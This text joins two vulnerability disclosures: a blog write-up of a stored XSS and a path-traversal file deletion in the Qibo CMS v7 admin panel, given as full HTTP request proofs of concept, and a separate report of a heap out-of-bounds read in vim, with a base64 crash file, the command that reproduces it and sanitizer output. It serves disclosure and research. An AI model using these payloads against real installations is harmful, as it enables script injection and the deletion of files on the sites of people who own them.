**0x03 Stored XSS in background**

position:/admin/index.php?lfj=friendlink&action=add  
request:

    POST /qibo7/admin/index.php?lfj=friendlink&action=add HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 283
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=friendlink&job=add
    Cookie: USR=faol4ey2%091%091571805064%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dfriendlink%26job%3Dadd; __tins__20133593=%7B%22sid%22%3A%201571802713278%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201571805446751%7D; __51cke__=; __51laig__=47; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Bname%5D=axin&postdb%5Bfid%5D=2&postdb%5Burl%5D=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&postdb%5Blogo%5D=&postdb%5Bdescrip%5D=&postdb%5Bifhide%5D=0&postdb%5Byz%5D=1&postdb%5Biswordlink%5D=0&postdb%5Bendtime%5D=&Submit=%E6%8F%90%E4%BA%A4%E6%95%B0%E6%8D%AE&id=
    

No dangerous characters are escaped， so we can insert our payload like below:  
`"><script>alert(1);</script>`  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123225890.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123328491.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123459678.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)  
of course, we can also combine the xss with the csrf to do more !

**0x04 Arbitrary File Deletion in background**

position:/admin/index.php?lfj=mysql&action=del

poc:

    POST /qibo7/admin/index.php?lfj=mysql&action=del HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=mysql&job=del
    Cookie: USR=faol4ey2%091%091571799626%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dmysql%26job%3Ddel; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=2%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=V29XS10LbVNSA1EBBgNVBwBXUQQNXQEBVF4GBVNcUlZdXgRQUlxd14a26ee802
    Upgrade-Insecure-Requests: 1
    
    baktime=../test.php&Submit=%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE
    

![在这里插入图片描述](https://img-blog.csdnimg.cn/2019102312471024.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

The problem occurred when the backup database was deleted， we can control the parameter “baktime”, and we can use `../` to achieve directory traversal purpose, so we can delete some web pages.I will show you details next.

firstly, create a file named `axin.php` in the root path of the application like below

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023125214905.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

and then send our payload

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023125423596.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

now, the file `axin.php` created just now has been deleted!

![在这里插入图片描述](https://img-blog.csdnimg.cn/2019102312545969.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

of course, we can also combine the vul with csrf to do more !

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200708212341789.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70#pic_center)

CVE-2020-20946: some vulnerabilities in qibosoft(齐博CMS整站系统v7)_一个安全研究员-CSDN博客

**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regarless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build in Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept****Steps to reproduce:**

1.  Clone the repo and build with ASAN.
    
2.  Recreate POC session:
    

    echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d >  min_read_4
    

Its content is:

    000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
    au!* 0 n0
    

3.  Load session:

    ./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'
    

Sanitizer output:

    =================================================================
    ==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
    READ of size 4 at 0x6070000003f8 thread T0
        #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
        #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
        #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
        #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
        #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
        #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
        #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
        #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
        #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
        #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
        #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)
    
    0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
    allocated by thread T0 here:
        #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
        #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd
      0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
      0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa[fa]
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==4102472==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

Tag

#ubuntu